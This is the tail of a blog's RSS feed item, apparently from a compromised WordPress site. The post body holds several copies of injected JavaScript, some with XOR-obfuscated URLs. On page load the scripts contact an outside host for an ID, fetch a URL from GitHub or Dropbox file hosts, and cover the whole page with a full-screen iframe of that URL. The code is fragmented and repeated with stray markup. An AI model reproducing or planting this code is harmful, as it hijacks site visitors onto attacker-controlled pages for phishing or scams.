          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script></p>
]]></content:encoded>
			<wfw:commentRss>http://kevrichard.com/2009/04/meshu-2009-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
